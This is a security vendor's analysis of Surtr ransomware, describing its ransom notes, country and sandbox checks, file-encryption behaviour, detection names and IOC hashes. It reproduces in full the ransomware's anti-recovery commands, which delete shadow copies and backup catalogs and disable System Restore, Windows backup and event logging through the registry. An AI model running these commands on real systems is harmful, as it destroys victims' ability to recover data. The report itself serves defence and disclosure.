Through internal monitoring, the ASEC analysis team has recently discovered that Surtr ransomware is being distributed. This ransomware encrypts files, then adds a “[DycripterSupp@mailfence.com].[<random string>].Surtr” file extension to the original file extension name.
When Surtr ransomware infects a system, it changes the desktop image of the infected PC and creates a ransom note (See Figures 1 and 2) to inform the user of the ransomware infection. Surtr also creates ransom note files (SURTR_README.hta and SURTR_README.txt) in folders containing the infected files.
Before the actual file encryption, Surtr carries out various tasks such as checking the list of processes along with the IP address of the country where the file is executed, and terminating services.
First, the ransomware performs a query through the “ip-api.com” socket (IP lookup service) and looks up the country in which the file is being executed. If the file is executed in a certain country, it halts the execution after displaying a message box as shown in the figure below.
After performing the check routine for the debugging status and sandbox of the target process, Surtr deletes the files in the Recycle Bin and creates the following directory which is used to save the files and the copy of the ransomware file that are created when the ransomware is executed.
- C:ProgramDataService
- %TEMP%Service
It also includes a logic that checks for the running services and processes in the target system to see if any of them correspond to the strings defined within the file (See Figures 5 and 6).
This is followed up by the execution of the following commands to re-adjust the size of the volume shadow copies and delete them for all defined drives, as well as disable the recovery environment, making it difficult for users to recover their original files after the infection.
| vssadmin resize shadowstorage /for= /on= /maxsize=401MB vssadmin resize shadowstorage /on= /maxsize=unbounded vssadmin.exe Delete Shadows /all /quiet bcdedit /set {default} recoveryenabled No bcdedit /set {default} bootstatuspolicy IgnoreAllFailures fsutil.exe usn deletejournal /D C: wbadmin.exe delete catalog -quiet schtasks.exe /Change /TN “MicrosoftWindowsSystemRestoreSR” /disable reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v StartMenuLogOff /t REG_DWORD /d 1 /f reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesNonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsWinRE /v DisableSetup /t REG_DWORD /d 1 /f reg add “HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindows NTSystemRestore” /v DisableConfig /t REG_DWORD /d 1 /f reg add “HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindows NTSystemRestore” /v DisableSR /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsBackupClient /v DisableBackupToDisk /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsBackupClient /v DisableBackupToNetwork /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsBackupClient /v DisableBackupToOptical /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsBackupClient /v DisableBackupLauncher /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsBackupClient /v DisableRestoreUI /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsBackupClient /v DisableBackupUI /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsBackupClient /v DisableSystemBackupUI /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsBackupServer /v OnlySystemBackup /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsBackupServer /v NoBackupToDisk /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsBackupServer /v NoBackupToNetwork /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsBackupServer /v NoBackupToOptical /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsBackupServer /v NoRunNowBackup /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlWMIAutologgerEventLog-System{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f |
Furthermore, the ransomware encrypts files in all drives aside from those with the file extensions “surt,” “dll,” “exe,” and “lnk” (See Figure 7), and files under a certain path are exempt from encryption (See Figure 8).
After encrypting the files, Surtr performs additional behaviors such as creating ransom notes and deleting event logs, as shown in Figure 9.
AhnLab’s anti-malware software, V3, detects and responds to Surtr ransomware with a variety of detection points, including file detection and behavior-based detection. To prevent ransomware infection, users must be cautious of running files from unknown sources and make sure to scan suspicious files with an anti-malware program while also keeping the program updated to the latest version. AhnLab’s anti-malware software, V3, detects and blocks the malware using the following aliases:
[File Detection]
- Ransomware/Win.Generic.C5285743 (2022.10.25.02)
[Behavior Detection]
- Ransom/MDP.Nemty.M2599
[IOC Info]
- ad539ebdf9e34e02be487134cf9a6713
- e31b96b8a74075935360b5e5a18926e9
- 674e7ee905d24a89af47b53b53ffc23c
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
No tags for this post.